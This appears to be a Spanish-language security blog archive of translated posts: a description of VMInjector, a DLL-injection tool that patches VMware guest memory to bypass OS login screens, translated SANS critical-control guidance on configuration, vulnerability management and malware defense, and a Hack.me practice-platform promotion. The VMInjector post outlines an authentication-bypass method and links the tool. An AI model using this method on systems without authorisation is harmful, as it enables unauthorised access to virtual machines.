miércoles, 14 de noviembre de 2012

VMInjector - Herramienta de Inyección DLL para desbloquear máquinas virtuales invitadas

Saludos Mundo libre.

Me he encontrado una herramienta para probar.

VMInjector - Herramienta de Inyección DLL para desbloquear máquinas virtuales invitadas


Información general:

VMInjector es una herramienta diseñada para evitar utilizar las pantallas de inicio de sesión de autenticación de los sistemas operativos más importantes que se ejecutan en VMware Workstation / Player, mediante el uso de memoria manipulación directa.

Descripción:

VMInjector es una herramienta que manipula la memoria de los clientes de VMware con el fin de eludir el sistema de operación de la pantalla de autenticación.

VMware maneja los recursos asignados a los sistemas operativos invitados, incluyendo la memoria RAM. VMInjector inyecta una biblioteca DLL en el proceso de VMWare para obtener acceso a los recursos asignados. La biblioteca DLL trabaja por espacio de memoria en el análisis de propiedad del proceso de VMware y localizar el archivo asignado en memoria RAM, lo que corresponde a la imagen de la memoria RAM del huésped. Mediante la manipulación del fichero RAM asignada y la función de aplicación de parches a cargo de la autenticación, un atacante obtiene acceso no autorizado a la máquina virtual subyacente.

VMInjector actualmente pueden pasar por alto bloqueado Windows, Ubuntu y Mac OS X sistemas operativos.

La aplicación de parches en la memoria no es persistente, y reiniciar la máquina virtual invitada a restaurar la funcionalidad de contraseña normal.

Atacar Escenarios:

VMInjector se puede usar si la contraseña de un host virtual se olvida y requiere reajuste.

Más generalmente, esta herramienta puede ser utilizada durante las actividades de pruebas de penetración, cuando el acceso a un host de VMware se logra y el atacante está tratando de obtener acceso adicional a los invitados que se ejecutan en el host, por ejemplo.

Requisitos:

    Máquina Windows (con acceso administrativo);
    VMware workstation o edición jugador;
    Un invitado bloqueado VM;

Uso:

VMInjector consta de 2 partes:

    La aplicación de inyección DLL (script python o suministrado ejecutable convertido)
    DLL de la biblioteca (x86 y x64)

La herramienta es compatible con las arquitecturas x86 bits y x64, proporcionando ambos archivos DLL. Uno puede utilizar su propio inyector DLL para seleccionar la máquina virtual invitada en ejecución en el host.

Con el fin de ejecutar la herramienta, ejecute el VMInjector (32 o 64) ejecutable proporcionado desde la línea de comandos tal como se muestra en la figura 1.

Figura 1: Lista de ejecutar máquinas clientes corriendo.






VMWare ejecuta cada huésped en un proceso diferente. VMInjector hay que señalar que el proceso que se ejecuta el cliente que requiere bypass. Una vez que el usuario elige un proceso, se inyecta la DLL en el destino elegido.

Una vez que el DLL se inyecta, el usuario tendrá que especificar el sistema operativo, de manera que la aplicación de parches memoria se puede lograr, como se muestra en la Figura 2.

Figura 2: En busca de la firma OS en la memoria y parches.



Herramientas y código fuente:

El ejecutable de la herramienta y el código fuente se puede encontrar en GitHub (https://github.com/batistam/VMInjector)

Descargo de responsabilidad:

Esta herramienta es para propósitos legales solamente. El código está liberado bajo licencia GPLv3.

Gracias y referencias:

Me gustaría dar las gracias a Michael Ligh por su valiosa investigación en la inyección de código shell en máquinas virtuales invitadas en 2006.

También me gustaría dar las gracias a Carsten Maartmann-Moe para un trabajo en Inception, una herramienta que puede desbloquear bloqueado Windows, Ubuntu y máquinas OS X usando el estándar IEEE 1394 FireWire truco. Esta fue exhibido por primera vez por la herramienta (ahora obsoleto) winlockpwn.

Créditos:

Herramienta codificado por Marco Batista

Lo podremos descargar desde.

https://github.com/batistam/VMInjector

Hay selas dejo exelente herramienta que tenemos que tener todos.

Fuente:http://www.secforce.com/blog/2012/11/vminjector/

Traduccion:Dellcom1@.

Saludos Mundo Libre.

20 vulnerabilidades criticas 5.0

Saludos Mundo libre.

He aqui la 5.0 vulnerabilidad de las 20 vulnerabilidades criticas.

Hoy nostoca un exelente tema.

Defensas Malware

¿Cómo atacantes aprovechan de la ausencia de este control?

El software malicioso es un aspecto integral y peligrosa de las amenazas de Internet, dirigido a los usuarios finales y de las organizaciones a través del navegador web, archivos adjuntos de correo electrónico, dispositivos móviles, la nube y otros vectores. El código malicioso puede alterar el contenido del sistema, capturar datos sensibles, y se extendió a otros sistemas. El malware moderno tiene como objetivo evitar la detección basada en firmas y de comportamiento, y puede desactivar el anti-virus herramientas que se ejecutan en el sistema de destino. Anti-virus y anti-spyware software, denominados colectivamente como herramientas anti-malware, ayudar a defenderse contra estas amenazas, tratando de detectar programas maliciosos y bloquear su ejecución.
Cómo implementar, automatizar y medir la efectividad de este control

1. Ganancias rápidas: Emplear herramientas automatizadas para monitorear continuamente las estaciones de trabajo, servidores y dispositivos móviles para activo, up-to-fecha de protección anti-malware con anti-virus, anti-spyware, firewall personal, y basado en host funcionalidad IPS. Todas las pruebas de detección de malware se deben enviar a las herramientas de administración empresarial anti-malware y servidores de registro de eventos. La solución de seguridad de punto final debe incluir protección de día cero, como la heurística de comportamiento de red.

2. Victorias rápidas: Emplear software anti-malware y características de la firma de actualización automática o manualmente los administradores han empujar cambios a todas las máquinas en una base diaria. Después de aplicar la actualización, los sistemas automatizados deben verificar que cada sistema ha recibido su actualización de firmas.

3. Ganancias rápidas: Configurar los ordenadores portátiles, estaciones de trabajo y servidores para que no se auto-run contenido de tokens USB (es decir, "pen drives"), discos duros USB, CD / DVD, dispositivos firewire externos, dispositivos Serial avanzadas Technology Attachment, montado recursos compartidos de red, u otros medios extraíbles. Si los dispositivos no son necesarios para el uso del negocio, que debe ser desactivada.

4. Ganancias rápidas: Configurar sistemas para que lleven a cabo un sistema automatizado de escaneo anti-malware de medios extraíbles cuando se inserta.

5. Ganancias rápidas: Todos los archivos adjuntos de correo electrónico que entran en la organización e-mail gateway debe ser escaneado y bloqueado si contienen código malicioso o tipos de archivos innecesarios para el negocio de la organización. Esta exploración se debe hacer antes de que el correo electrónico se coloca en la bandeja de entrada del usuario. Esto incluye el correo electrónico filtrado de contenidos y filtrado de contenidos web.

6. Ganancias rápidas: Aplicar el análisis antivirus en el gateway de Proxy Web. El filtrado de contenido para tipos de archivo se debe aplicar en el perímetro.

7. Ganancias rápidas: características Implementar y herramientas tales como la prevención de ejecución de datos (DEP) y Enhanced Experience Toolkit Mitigación (EMET), productos que proporcionan espacio aislado (por ejemplo, ejecutar el navegador en una máquina virtual), y otras técnicas que evitan la explotación malware.

8. Ganancias rápidas: limitar el uso de dispositivos externos a los que tienen necesidad del negocio. Monitor para el uso y el intento de uso de dispositivos externos.

9. Visibilidad / Atribución: Bloquear el acceso a correo electrónico externas de sistemas, servicios de mensajería instantánea y otras herramientas de medios sociales.

10. Visibilidad / Reconocimiento: Las herramientas automatizadas de control debe utilizar un comportamiento basado en la detección de anomalías para complementar y mejorar tradicional detección basada en firmas.

11. Visibilidad / Reconocimiento: Utilizar la red basados ​​en herramientas anti-malware para analizar todo el tráfico entrante y filtrar el contenido malicioso antes de que llegue al punto final.

12. Avanzado: La vigilancia continua debería llevarse a cabo en todo el tráfico entrante y saliente. Las grandes transferencias de datos o tráfico no autorizado debe ser marcado y, de ser validado como malicioso, el equipo debe ser trasladado a una VLAN aislada.

13. Avanzado: Implementar un proceso de respuesta a incidentes que permita su organización de TI Soporte para abastecer su equipo de seguridad con muestras de malware ejecutándose sin ser detectado en los sistemas corporativos. Las muestras deben ser proporcionada al proveedor de seguridad para "out-of-band" de creación de firma y desplegado a la empresa por los administradores del sistema.

14. Avanzado: Utilizar la red basados ​​en herramientas de análisis de flujo para analizar el tráfico entrante y saliente en busca de anomalías, indicadores de malware y sistemas comprometidos.

15. Avanzado: Deploy "basado en la reputación tecnologías" en todos los dispositivos de punto final para cubrir la brecha de las tecnologías basadas en firmas.

16. Avanzado: Habilitar nombre de dominio del sistema (DNS) consulta el registro para detectar búsqueda de nombre de host para dañinos conocidos dominios C2.

17. Avanzado: Aplicar la tecnología proxy para todas las comunicaciones entre la red interna e Internet.
Associated NIST Special Publication 800-53, Revisión 3, Prioridad 1 Controles

SC-18, SC-26, IS-3 (a, b, 1, 2, 5, 6)
Asociadas NSA manejables Hitos Red Plan y tareas de seguridad de red

Antivirus y sistemas de prevención de intrusiones de host (HIPS)

Personal Electronic Device (PED) Gestión

Network Access Protection / Control (NAP / NAC)

Security Gateways, Proxies y Firewalls

Red de Monitoreo de Seguridad
Procedimientos y herramientas para implementar y automatizar este control

Basándose en la política y la acción del usuario para guardar herramientas anti-malware hasta la fecha ha sido ampliamente desacreditado, ya que muchos usuarios no han demostrado ser capaces de manejar consistentemente esta tarea. Para asegurarse de firmas antivirus estén actualizados, las organizaciones utilizan la automatización. Ellos usan el. Funciones integradas administrativas de suites de seguridad empresarial de punto final para verificar que anti-virus, anti-spyware, y basadas en host IDS funciones están activas en cada sistema administrado Corren evaluaciones automatizadas diario y revisar los resultados para encontrar y mitigar los sistemas que se han desactivado este tipo de protecciones, así como los sistemas que no cuentan con las últimas definiciones de malware.

Algunas empresas desplegar honeypot libre o comercial y las herramientas para identificar a los atacantes TARPIT en su entorno. El personal de seguridad debe supervisar continuamente honeypots y Tarpits para determinar si el tráfico se dirige a ellos y las cuentas de acceso se intentó. Cuando identifican este tipo de eventos, este personal debe reunir la dirección de la fuente de la que este tráfico se origina y otros detalles relacionados con el ataque para el seguimiento de la investigación.

Control 5 Metric:

El sistema debe identificar cualquier software malicioso que se instala, trató de ser instalado, ejecutado, o tratado de ser ejecutado en un sistema informático dentro de una hora, alertas o el envío de notificaciones por correo electrónico a una lista de personal de la empresa a través de su central anti-malware consola o sistema de registro de eventos. Los sistemas deben bloquear la instalación, evitar la ejecución, o software malicioso cuarentena dentro de una hora, alertas o enviar e-mail cuando esta acción se ha producido. Cada 24 horas después de ese punto, el sistema debe alertar o enviar e-mail sobre el estado del código malicioso hasta que la amenaza ha sido completamente mitigado en ese sistema. Si bien el plazo de una hora representa la métrica actual para ayudar a las organizaciones a mejorar su estado de seguridad, en las futuras organizaciones deben esforzarse para la detección más rápida y aislamiento viral.
Control 5 Test:

Para evaluar la aplicación de control 5 en forma periódica, el equipo de evaluación debe mover un programa de prueba de software benigno que parece ser malware (tal como un archivo EICAR o herramientas de hackers benignos), pero que no está incluido en la lista de software funcionario autorizado para 10 sistemas de la red a través de un recurso compartido de red. La selección de estos sistemas deben ser tan aleatorio como sea posible e incluir una sección transversal de sistemas de la organización y ubicaciones. El equipo de evaluación debe verificar que los sistemas de generar un aviso de alerta por correo electrónico o en relación con el malware benigno en una hora. El equipo también debe verificar que la alerta o e-mail indicando que el software ha sido bloqueado o puesto en cuarentena se recibe dentro de una hora. El equipo de evaluación debe verificar que el sistema proporciona información sobre la ubicación de cada máquina con este nuevo archivo de prueba, incluida la información sobre el propietario de los activos. Posteriormente, el equipo debe verificar que el archivo se bloquea al intentar ejecutar o abrirlo y comprobar que no se le permite tener acceso.

Una vez que esta prueba se ha realizado la transferencia de los archivos a los sistemas de organización a través de medios extraíbles, la misma prueba debe repetirse, pero esta vez de transferir el malware benigna en 10 sistemas a través de correo electrónico en lugar. La organización debe esperar los resultados notificación que, como se indica con la prueba de medios extraíbles.
Entidad de Control 5 del Sistema Diagrama de relaciones (ERD):

Organizaciones encontrará que la diagramación de las entidades necesarias para cumplir plenamente los objetivos definidos en este control, será más fácil identificar la manera de implementar, probar los controles, e identificar dónde los posibles fallos en el sistema pueden ocurrir.

Un sistema de control es un dispositivo o conjunto de dispositivos para la gestión, mando, dirigir o regular el comportamiento de otros dispositivos o sistemas. En este caso, estamos examinando los sistemas anti-malware y vectores de amenazas tales como los medios extraíbles. La siguiente lista de los pasos en el diagrama de arriba muestra cómo las entidades trabajan juntos para alcanzar el objetivo de negocio definida en este control. La lista también ayuda a identificar qué cada uno de los pasos del proceso con el fin de ayudar a identificar los puntos potenciales de fallo en el control general.







Paso 1: Anti-malware de los sistemas de análisis de los sistemas de producción y medios extraíbles

Paso 2: Los medios extraíbles se analiza cuando se conecta a los sistemas de producción

Paso 3: Email / Web y dispositivos de red proxy de analizar todo el tráfico entrante y saliente

Paso 4: Control de acceso a la red monitorea todos los sistemas conectados a la red

Paso 5: Intrusión / red de sistemas de vigilancia realiza un seguimiento continuo en busca de signos de malware.

Fuente:http://www.sans.org/critical-security-controls/control.php?id=5

Traduccion:Dellcom1@.

Saludos Mundo Libre.

martes, 13 de noviembre de 2012

Hack.me - Generar, Host & Share código vulnerable de aplicaciones Web

Saludos Mundo Libre.


Hack.me - Generar, Host & Share código vulnerable de aplicaciones Web

Hack.me es un proyecto libre, basada en la comunidad impulsado por eLearnSecurity. La comunidad le permite construir, de acogida y participación vulnerable código de aplicaciones Web con fines educativos y de investigación.

Su objetivo es ser la mayor colección de "ejecutables" aplicaciones web vulnerables, ejemplos de código y en línea CMS. La plataforma está disponible sin ningún tipo de restricción para cualquier persona interesada en la seguridad de aplicaciones Web: estudiantes, las universidades, los investigadores, los probadores de penetración y desarrolladores web.

Hack.me - Generar, Host & Share aplicaciones web vulnerables

Características

     Cargue su propio código
     Online IDE para PHP y MySQL
     Su código alojado en la nube
     GRATIS!
     Práctica de aplicación de web de seguridad
     entorno aislado
     Online: nada para descargar gratis!

seguridad

Cada vez que se ejecuta un nuevo hackme el sitio iniciará una caja de arena nueva para usted. Usted tendrá acceso aislado de modo que usted sepa siempre que la aplicación es segura para su uso. Ningún otro estudiante puede añadir malware o exploits en su caja de arena. Esto garantiza 99% de seguridad.

¿Qué pasa con el 1%? Mientras que el equipo hace el mejor esfuerzo para moderar todos y cada nueva aplicación web subido en Hack.me, lo más probable es que algo puede y se deslice a través. Si usted no está 100% cómodo para confiar en nosotros o el desarrollador hackme, por favor, basta con ejecutar Hackmes nuevos desde una máquina virtual o desde un sistema operativo no sea de producción.

Hemos escrito sobre una variedad de aplicaciones web donde se puede practicar el hack-fu, tales como:

     Bodgeit Store
     Jarlsberg
     WackoPicko
     Aplicación Web Damn Vulnerable (DVWA)
     Vicnum
     Metasploitable.

Fuente:https://hack.me/

Traduccion:Dellcom1@

20 vulnerabilidades criticas 4.0

Saludos Mundo libre.

He aqui la 4.0 vulnerabilidad de las 20 vulnerabilidades criticas.

Evaluación de la vulnerabilidad continua y Remediación

¿Cómo atacantes aprovechan de la ausencia de este control?

Al poco tiempo se descubren nuevas vulnerabilidades y reportados por los investigadores de seguridad o vendedores, ingeniero atacantes explotar código y luego lanzar el código con los objetivos de interés. Los retrasos significativos en la búsqueda o la fijación de software con vulnerabilidades peligrosas ofrece amplias oportunidades para que los atacantes persistentes para abrirse paso, ganar control sobre las máquinas vulnerables y tener acceso a los datos confidenciales que contienen. Las organizaciones que no escanear en busca de vulnerabilidades y fallas de dirección descubiertos de forma proactiva frente a una probabilidad significativa de que sus sistemas informáticos comprometida. Las vulnerabilidades también debe estar ligada a la inteligencia de amenazas y priorizar adecuadamente.

Como análisis de vulnerabilidades se vuelven más comunes, los atacantes están utilizando ellos como punto de explotación. Es importante controlar cuidadosamente los análisis de vulnerabilidad y autenticadas por el administrador de la cuenta asociada. Los atacantes tomar el control de una máquina con privilegios locales, y esperar a un análisis autenticado que se produzca contra la máquina. Cuando el escáner se conecta con privilegios de administrador de dominio, el atacante agarra la señal del. Registrados en la exploración de herramientas, o huele la respuesta al desafío y las grietas que De cualquier manera, el atacante puede girar en cualquier otro lugar en la organización como administrador de dominio.
Cómo implementar, automatizar y medir la efectividad de este control

1. Ganancias rápidas: Ejecutar escaneo automático de vulnerabilidades herramientas contra todos los sistemas en sus redes sobre una base semanal o más frecuente con un escáner de vulnerabilidades SCAP-validado que mira para ambos basados ​​en código vulnerabilidades (CVE) y configuración basadas en vulnerabilidades (CCE). Cuando sea posible, el análisis de vulnerabilidades debe ocurrir sobre una base diaria usando una herramienta de vulnerabilidad hasta al día de exploración. Cualquier vulnerabilidad determinada debe ser remediado de manera oportuna, con vulnerabilidades críticas fijados dentro de las 48 horas.

2. Victorias rápidas: Los registros de eventos se correlacionan con la información de vulnerabilidad computarizadas para cumplir dos objetivos. En primer lugar, el personal debe verificar que la actividad de las herramientas de detección regulares vulnerabilidad se ha iniciado sesión. En segundo lugar, el personal debe ser capaz de correlacionar eventos de detección de ataques a la vulnerabilidad antes de barrido resultados para determinar si la hazaña dado fue usado contra un objetivo conocido por ser vulnerable.

3. Victorias rápidas: Utilizar una cuenta especial para las exploraciones de vulnerabilidades autenticados. La cuenta de exploración no se debe utilizar para todas las actividades administrativas y otros ligados a determinadas direcciones IP. Asegúrese de que sólo los empleados autorizados tienen acceso a la interfaz de usuario de gestión de vulnerabilidad y que los roles se aplican a cada usuario.







4. Ganancias rápidas: Suscribirse a los servicios de inteligencia de vulnerabilidad a fin de mantenerse al tanto de los riesgos emergentes.

5. Visibilidad / Reconocimiento: implementar herramientas automatizadas de gestión de parches y herramientas de actualización de software para el sistema operativo y el software / aplicaciones en todos los sistemas para los que estas herramientas están disponibles y segura. Los parches deben ser aplicados a todos los sistemas, incluso en sistemas que estén debidamente espacio de aire.

6. Visibilidad / Reconocimiento: Es importante vigilar cuidadosamente los registros asociados con cualquier actividad de exploración y cuentas asociadas administrador para asegurarse de que todas las actividades de exploración y de acceso asociado a través de la cuenta privilegiada se limita a los plazos de exploraciones legítimos.

7. Configuración / Higiene: Además de los análisis de vulnerabilidad sin autenticación, las organizaciones deben garantizar que todos los análisis de vulnerabilidad se realiza en modo autenticado ya sea con agentes que se ejecutan de forma local en cada sistema final para analizar la configuración de seguridad o con escáneres remotos que se dan permisos de administrador en el sistema de bienestar probado.

8. Configuración / Higiene: Comparar los resultados de back-to-back vulnerabilidad analiza para verificar que las vulnerabilidades se abordaron ya sea por aplicación de parches, la implementación de un control de compensación, o documentar y aceptar un riesgo comercial razonable. Tal aceptación de los riesgos de negocio para las vulnerabilidades existentes deben ser revisados ​​periódicamente para determinar si los nuevos controles de compensación o parches posteriores pueden tratar las vulnerabilidades que fueron aceptadas con anterioridad, o si han cambiado las condiciones que aumenta el riesgo.

9. Configuración / Higiene: herramientas de exploración de vulnerabilidades debe ser ajustado para comparar los servicios que están escuchando en cada equipo con una lista de servicios autorizados. Las herramientas deben estar más afinado para identificar los cambios a través del tiempo en los sistemas para los servicios autorizados y no autorizados.

10. Configuración / Higiene: Mida el retardo de las vulnerabilidades de parches y cerciorarse de que el retraso es igual o inferior a los valores de referencia establecidos por la organización. Medidas alternativas se debe considerar si los parches no están disponibles.

11. Configuración / Higiene: parches críticos deben ser evaluados en un entorno de prueba antes de ser empujados a la producción de sistemas de la empresa. Si dichos parches romper las aplicaciones críticas de negocio en las máquinas de prueba, la organización debe diseñar otros controles de mitigación que la explotación bloque en sistemas en los que el parche no se puede implementar por su impacto en la funcionalidad empresarial.

12. Configuración / Higiene: Atender las vulnerabilidades más perjudiciales primero. Dar prioridad a los activos vulnerables basadas tanto en los aspectos técnicos y específicos de la organización los riesgos del negocio. Un ranking de vulnerabilidad a nivel industrial o empresarial amplio puede ser insuficiente para dar prioridad a que los activos específicos para abordar en primer lugar. Una ejecución por fases se puede utilizar para minimizar el impacto en la organización.
Associated NIST Special Publication 800-53, Revisión 3, Prioridad 1 Controles

RA-3 (a, b, c, d), RA-5 (A, B, 1, 2, 5, 6)
Asociadas NSA manejables Hitos Red Plan y tareas de seguridad de red

Hito 6: Gestión de Parches
Procedimientos y herramientas para implementar y automatizar este control

Un gran número de herramientas de análisis de vulnerabilidad están disponibles para evaluar la configuración de seguridad de los sistemas. Algunas empresas han encontrado también servicios comerciales que utilizan gestionados remotamente dispositivos de escaneo para ser eficaz. Para ayudar a estandarizar las definiciones de las vulnerabilidades descubiertas en los diferentes departamentos de una organización o incluso a través de las organizaciones, es preferible utilizar herramientas de escaneo de vulnerabilidades que los defectos de Medidas de Seguridad y asignarlos a las vulnerabilidades y problemas categorizados utilizando uno o más de los siguientes reconocida por la industria vulnerabilidad , configuración y esquemas de clasificación de plataforma y lenguajes: CVE, CCE, OVAL, CPE, CVSS, y / o XCCDF.

Herramientas avanzadas de escaneo de vulnerabilidades puede ser configurado con las credenciales de usuario para conectarse a los sistemas escaneados y realizar análisis más completos que se pueden lograr sin credenciales de inicio de sesión. La frecuencia de las actividades de análisis, sin embargo, debe aumentar a medida que la diversidad de sistemas de una organización aumenta para dar cuenta de los ciclos de parches variables de cada proveedor.

Además de las herramientas de análisis que detectan las vulnerabilidades y errores de configuración de la red, varias herramientas gratuitas y comerciales pueden evaluar las opciones de seguridad y configuraciones de los equipos locales en los que están instalados. Estas herramientas pueden proporcionar de grano fino idea de los cambios no autorizados en la configuración o la introducción inadvertida de fallos de seguridad por los administradores.

Las organizaciones eficaces vincular sus escáneres de vulnerabilidad con problemas sistemas de ticketing que controla automáticamente e informar sobre los avances en la solución de problemas, y que hacen que no mitigados vulnerabilidades críticas visibles a los niveles superiores de la administración para asegurar que los problemas se resuelven.

Las herramientas de escaneo de vulnerabilidades más eficaces comparar los resultados de la exploración actual con exploraciones previas para determinar cómo las vulnerabilidades en el entorno han cambiado con el tiempo. El personal de seguridad utilizar estas características para llevar a cabo la vulnerabilidad de tendencias de mes a mes.

Como vulnerabilidades relacionadas con los sistemas sin parches son descubiertos mediante el análisis de las herramientas, el personal de seguridad debe determinar y documentar la cantidad de tiempo que transcurre entre la publicación de un parche para el sistema y la aparición de la exploración de vulnerabilidades. Si este periodo de tiempo superior a los puntos de referencia de la organización para el despliegue de nivel de criticidad del parche determinado, personal de seguridad debe tener en cuenta la demora y determinar si la desviación ha sido documentada formalmente por el sistema y su parche. Si no, el equipo de seguridad debería trabajar con la administración para mejorar el proceso de actualización.

Además, algunas herramientas de parches automatizados no pueden detectar o instalar algunos parches debido a un error por parte del vendedor o administrador. Debido a esto, todos los cheques de parches deben conciliar los parches del sistema con una lista de parches de cada fabricante ha anunciado en su página web.
Control 4 Metric:

Todas las máquinas identificadas por el sistema de inventario de activos asociados a críticos de control 1 deben ser analizados en busca de vulnerabilidades. Además, si el escáner de vulnerabilidades identifica todos los dispositivos no incluidos en el inventario de activos, debe alertar o enviar un correo electrónico a la iniciativa personal administrativo dentro de las 24 horas. El sistema debe ser capaz de alertar o correo electrónico personal de la empresa administrativas dentro de una hora de vulnerabilidad automatizado semanal o diaria exploraciones se completó. Si el análisis no puede ser completado con éxito, el sistema debe alertar o enviar un correo electrónico al personal administrativo dentro de la hora que indica que la digitalización no se ha realizado correctamente. Cada 24 horas después de ese punto, el sistema debe alertar o enviar un correo electrónico sobre el estado de las exploraciones incompletas, hasta que se reanude exploración normal.

Herramientas automatizadas de gestión de parches debe alertar o enviar un correo electrónico al personal administrativo dentro de las 24 horas siguientes a la instalación correcta de los nuevos parches. Si bien los plazos de 24 horas y una hora-representan la métrica actual para ayudar a las organizaciones a mejorar su estado de seguridad, en el futuro, las organizaciones deben esforzarse para aún más rápido de alerta, con notificación sobre un activo no autorizado conectado a la red o una vulnerabilidad incompleto escanear enviar dentro de dos minutos.
Control 4 Test:

Para evaluar la aplicación de Control 4 en forma periódica, el equipo evaluador debe verificar que las herramientas de análisis se han completado con éxito sus exploraciones semanales o diarias de los últimos 30 ciclos de barrido mediante la revisión de las alertas y los informes archivados para asegurar que la exploración se ha completado. Si el análisis no se pudo completar en ese período de tiempo, el equipo evaluador debe verificar que una alerta por correo electrónico o se ha generado lo que indica que la exploración no terminó.
Entidad de Control 4 Sistema Diagrama de relaciones (ERD):

Organizaciones encontrará que la diagramación de las entidades necesarias para cumplir plenamente los objetivos definidos en este control, será más fácil identificar la forma de aplicar temperatura, probar los controles, e identificar dónde los posibles fallos en el sistema pueden ocurrir.

Un sistema de control es un dispositivo o conjunto de dispositivos para la gestión, mando, dirigir o regular el comportamiento de otros dispositivos o sistemas. En este caso, los escáneres de vulnerabilidad, sistemas de gestión, sistemas de gestión de parches y líneas de base de configuración de todo el trabajo en conjunto para abordar la gestión de una organización vulnerabilidad y la estrategia de remediación. La siguiente lista de los pasos en el diagrama de arriba muestra cómo las entidades trabajan juntos para alcanzar el objetivo de negocio definida en este control. La lista también ayuda a identificar qué cada uno de los pasos del proceso con el fin de ayudar a identificar los puntos potenciales de fallo en el control general.

Paso 1: El servicio de inteligencia de vulnerabilidad provee insumos para escáner de vulnerabilidades

Paso 2: Vulnerabilidad de los sistemas de producción escáneres de exploración

Paso 3: Los scanners de vulnerabilidades reportar vulnerabilidades detectadas para un sistema de gestión de vulnerabilidad (VMS)

Paso 4: El VMS compara los sistemas de producción de las líneas de base de configuración

Paso 5: El VMS envía la información al registro del sistema de gestión de correlación

Paso 6: El VMS elabora informes para la gestión

Paso 7: Un sistema de gestión de parches aplica actualizaciones de software para los sistemas de producción


Fente:http://www.sans.org/critical-security-controls/control.php?id=4

Traduccion:Dellcom1@.

Saludos Mundo Libre.

domingo, 11 de noviembre de 2012

20 vulnerabilidades criticas 3ra parte

Saludos Mundo Libre.

He aqui la 3ra parte de las 20 vulnerabilidades criticas ahora le toca a.

Configuraciones seguras para hardware y software en los dispositivos móviles, ordenadores portátiles, estaciones de trabajo y servidores.

¿Cómo atacantes aprovechan de la ausencia de este control?

Tanto en el Internet y las redes internas que los atacantes ya comprometidos, programas automatizados de ataques informáticos en constante búsqueda de redes de destino en busca de sistemas que se configuran con el software vulnerable instalado la forma en que fue entregado a los fabricantes y distribuidores, lo que es inmediatamente vulnerable a la explotación. Configuraciones predeterminadas se adaptan con frecuencia a la facilidad de despliegue y facilidad de uso y no de seguridad, dejando los servicios externos que son explotables en su estado por defecto. Además, los parches no siempre se aplican de manera oportuna y actualizaciones de software a menudo introducen fallos desconocidos en una pieza de software que puede ser explotado por ataques de día cero. Los atacantes intentan explotar tanto accesible desde la red de servicios y software de cliente de exploración utilizando estas técnicas.

Defensas contra estos exploits automatizados incluyen la adquisición de ordenador y componentes de la red con las configuraciones de seguridad ya aplicadas, la implementación de tales sistemas preconfigurados endurecidos, la actualización de estas configuraciones sobre una base regular, y el seguimiento de ellos en un sistema de gestión de la configuración.
Cómo implementar, automatizar y medir la efectividad de este control

1. Ganancias rápidas: Estricta gestión de la configuración, se seguirán construyendo una imagen de seguridad que se utiliza para construir todos los nuevos sistemas que se implementan en la empresa. Todo sistema que se ve comprometida es re-fotografiada con la construcción segura. Las actualizaciones regulares a esta imagen se integran en los procesos de la organización de gestión del cambio. Las imágenes deben ser creadas tanto para estaciones de trabajo y servidores.

2. Ganancias rápidas: las imágenes del sistema deben haber documentado la configuración de seguridad que se prueban antes de su despliegue, aprobada por una junta de organización de control de cambios, e inscrita en una biblioteca de imagen central para la organización o varias organizaciones. Estas imágenes deberán ser validadas y actualizar en forma periódica para actualizar la configuración de seguridad a la luz de recientes vulnerabilidades y vectores de ataque.

3. Ganancias rápidas: imágenes estandarizadas deben representar versiones reforzadas de que el sistema operativo subyacente y las aplicaciones instaladas en el sistema, tales como los publicados por el NIST, NSA, Agencia de Sistemas de Información de Defensa (DISA), Center for Internet Security (CIS), y otros . Este endurecimiento típicamente incluyen la eliminación de cuentas innecesarias, la desactivación o eliminación de servicios innecesarios y la configuración de las pilas y las pilas no ejecutables. Este endurecimiento también implica, entre otras medidas, la aplicación de parches, el cierre de los puertos de red abiertos y sin usar, la aplicación de sistemas de detección de intrusos y / o sistemas de prevención de intrusos y firewalls basados ​​en host erección.

4. Victorias rápidas: Las imágenes de los propios maestros deben ser almacenados en los servidores configurados con seguridad, con herramientas de comprobación de la integridad y gestión del cambio para asegurar que los cambios sólo los usuarios autorizados a las imágenes son posibles. Alternativamente, estas imágenes maestras se pueden almacenar en máquinas fuera de línea, con aire gapped de la red de producción, con las imágenes copiadas a través de medios seguros para moverlos entre los servidores de almacenamiento de imágenes y la red de producción. Las imágenes deben ser probados en el sitio de recuperación de desastres caliente o tibia que no hay uno disponible.

5. Victorias rápidas: Ejecute la última versión del software y asegúrese de que está completamente parcheado. Eliminación de software anticuado o más del sistema.

6. Visibilidad / Atribución: Cualquier desviación de la norma de construcción o cambios a la norma de construcción debe ser aprobada por una junta de control de cambios y documentados en un sistema de gestión del cambio.

7. Visibilidad / Reconocimiento: Negociar contratos para comprar sistemas configurados con seguridad fuera de la caja usando imágenes estandarizadas, que debían concebirse para evitar el software extraño que aumentaría su superficie de ataque y la susceptibilidad a las vulnerabilidades.

8. Visibilidad / Reconocimiento: Utilizar lista blanca de aplicaciones para controlar y gestionar los cambios de configuración en el software que se ejecuta en el sistema.

9. Configuración / Higiene: Toda la administración remota de servidores, estaciones de trabajo, dispositivos de red y equipo similar se llevará a cabo a través de canales seguros. Los protocolos como Telnet, VNC, RDP, u otros que no apoyan activamente una fuerte encriptación sólo se debe utilizar si se realizan a través de un canal cifrado secundaria, como SSL o IPSEC.

10. Configuración / Higiene: Utilizar herramientas de comprobación de la integridad de archivos en por lo menos una vez por semana para asegurarse de que los archivos críticos del sistema (incluido el sistema sensible y ejecutables de aplicaciones, bibliotecas y configuraciones) no han sido alterados. Todas las alteraciones en dichos archivos deben ser automáticamente informado al personal de seguridad. El sistema de información debe tener la capacidad de dar cuenta de los cambios de rutina y esperados, destacando alteraciones inusuales o inesperados.

11. Configuración / Higiene: Implementar y probar un sistema de configuración de monitoreo automatizado que mide todos los elementos de configuración de seguridad que se pueden medir a través de pruebas a distancia, utilizando las características como las que se incluye con las herramientas compatibles con Content Security Automation Protocol (SCAP) para reunir información sobre la vulnerabilidad de configuración. Estos ensayos automatizados deben analizar tanto de hardware como los cambios de software, los cambios de configuración de red, y otras modificaciones que afectan a la seguridad del sistema.

12. Configuración / Higiene: Implementar herramientas del sistema de gestión de la configuración, tales como objetos de Active Directory directiva de grupo para los sistemas Microsoft Windows o títeres para sistemas Unix que forzará automáticamente y los ajustes de configuración para volver a desplegar sistemas a intervalos regulares.

13. Avanzado: Las organizaciones deben adoptar un proceso formal y la infraestructura de gestión de control de la configuración de los dispositivos móviles. El proceso debe incluir borrado de seguridad remotas de dispositivos perdidos o robados, la aprobación de aplicaciones empresariales, y la negación de aplicaciones no aprobadas. Si el dispositivo es propiedad de la organización, un completo limpie debe ser realizada. Si se trata de un sistema de BYOD, un selectivo limpiar se debe realizar, la eliminación de información de la organización.
